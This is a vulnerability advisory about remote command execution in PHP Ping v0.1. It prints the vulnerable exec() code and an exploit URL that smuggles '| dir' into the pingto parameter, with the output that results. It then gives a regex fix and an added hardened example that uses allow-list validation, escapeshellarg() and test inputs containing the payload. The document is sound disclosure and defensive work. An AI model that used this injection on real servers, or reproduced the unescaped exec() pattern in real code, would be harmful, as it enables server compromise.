COMMAND

    PHP Ping Remote Command Execution

SYSTEMS AFFECTED

    PHP Ping v0.1 and prior

PROBLEM

    Thanks to Grégory Le Bras aka GaLiaRePt of Security Corporation in
    security advisory [SCSA-009]:
    http://www.security-corp.org/advisories/SCSA-009-FR.txt

    PHP Ping "will allow you, provided that your server turns under
    Windows, to realize a "ping" on the host of your choice." (direct
    quote from the PHP Ping website)

DETAILS
________________________________________________________________________

    A vulnerability has been found in PHP Ping which allows a remote
    attacker to execute commands on the web server. The user-supplied
    target host (the pingto parameter, $cible in the code below) is
    interpolated into the exec() command string without validation or
    escaping, so shell metacharacters such as "|" are interpreted by the
    shell and append further commands to the ping. This vulnerability
    would allow a remote attacker to compromise parts of the operating
    system, possibly the complete operating system.

    Vulnerable code:

    <?php
    //*************************************
    // PING FUNCTION
    //*************************************
    function PHPing($cible, $pingFile) {
        // $cible reaches the shell unescaped: metacharacters in the
        // user-supplied host are interpreted by the command interpreter
        exec("ping -a -n 1 $cible >$pingFile", $list);
        $fd = fopen($pingFile, "r");
        $ping = "";
        while (!feof($fd)) {
            $ping .= fgets($fd, 256);
        }
        fclose($fd);
        return $ping;
    }
    //-------------------------------------
    ?>

EXPLOIT
________________________________________________________________________

    The vulnerability is in the page that executes the "ping", at this
    address:

    http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir

    This exploit simply lists the contents of the current directory:

     c:\phpping

    03/03/2003  23:01    <DIR>          .
    03/03/2003  23:01    <DIR>          ..
    03/03/2003  23:00    <DIR>          img
    30/04/2002  23:13             3217  index.php
    30/04/2002  23:19              921  README
    03/03/2003  23:03                0  resultat.ping
                   3 file(s)          4138 bytes
                   3 Dir(s)   11413962752 bytes free

SOLUTION

    For example, use this code:

    <?php
    //*************************************
    // PING FUNCTION
    //*************************************
    function PHPing($cible, $pingFile) {
        # BugFix by Gregory LEBRAS www.security-corp.org
        // Reject anything that is not "name.tld"-shaped before it reaches exec()
        if ((!$cible) || (!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i", $cible))) {
            echo("Error: Please specify a valid target host or IP.");
            exit;
        } else {
            exec("ping -a -n 1 $cible >$pingFile", $list);
            $fd = fopen($pingFile, "r");
            $ping = "";
            while (!feof($fd)) {
                $ping .= fgets($fd, 256);
            }
            fclose($fd);
            return $ping;
        }
    }
    //-------------------------------------
    ?>
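The advisory's fix leaves a single regular expression as the only barrier between user input and the shell, and that expression also rejects legitimate targets: it requires at least one dot, and its {1,3} quantifier limits the last label to three characters, so a bare hostname such as localhost or a domain ending in .info is refused. The PHP below is added here as an example and is not code from the advisory or from PHP Ping. It shows the pattern a reviewer would ask for instead: an allow-list validator that accepts RFC 1123 hostname labels or an IPv4 literal, escapeshellarg() on the value that reaches exec() as a second layer, and the ping output read from exec()'s output array rather than a shared result file like resultat.ping. The function names is_valid_ping_target and ping_safely and the sample inputs are the example's own.

```php
<?php
// Added example (not from the advisory or from PHP Ping): a hardened
// ping handler for a Windows host. Two controls the vulnerable exec()
// call lacks: allow-list validation of the target, and quoting of the
// argument that reaches the shell.

function is_valid_ping_target(string $target): bool
{
    // A DNS name is at most 253 characters; refuse empty input outright.
    if ($target === '' || strlen($target) > 253) {
        return false;
    }
    // Dotted-quad IPv4 literal.
    if (filter_var($target, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return true;
    }
    // Hostname: labels of letters, digits and hyphens, 1-63 characters,
    // not starting or ending with a hyphen, separated by single dots.
    // Spaces, "|", "&", ";", "%" and quotes can never match.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return preg_match('/^' . $label . '(?:\.' . $label . ')*$/', $target) === 1;
}

function ping_safely(string $target): string
{
    if (!is_valid_ping_target($target)) {
        return "Error: Please specify a valid target host or IP.";
    }
    // Belt and braces: the validator already excludes metacharacters,
    // but quoting keeps the value a single shell word if the allow-list
    // is ever loosened. Output is collected in $output, so no result
    // file in the web root is needed.
    $cmd = 'ping -a -n 1 ' . escapeshellarg($target);
    exec($cmd, $output);
    return implode(PHP_EOL, $output);
}

// Constructed inputs, including the payload from the advisory's URL.
$samples = [
    'www.security-corp.org'           => true,
    'localhost'                       => true,
    'example.info'                    => true,
    '192.168.1.10'                    => true,
    'www.security-corp.org | dir'     => false,  // the advisory's payload
    'www.security-corp.org%20|%20dir' => false,  // same payload, still URL-encoded
    'bad..name'                       => false,  // empty label
    '-leadinghyphen.example'          => false,
];
foreach ($samples as $input => $expected) {
    $actual = is_valid_ping_target($input);
    printf("%-38s valid=%-5s %s\n",
        var_export($input, true),
        var_export($actual, true),
        $actual === $expected ? 'ok' : 'MISMATCH');
}
```

The validator is the real control; escapeshellarg() is deliberately redundant with it. Keeping both means a later relaxation of the allow-list (for instance to admit IPv6 literals) does not silently reopen the injection, and reading exec()'s output array removes the need for a writable file inside the web root.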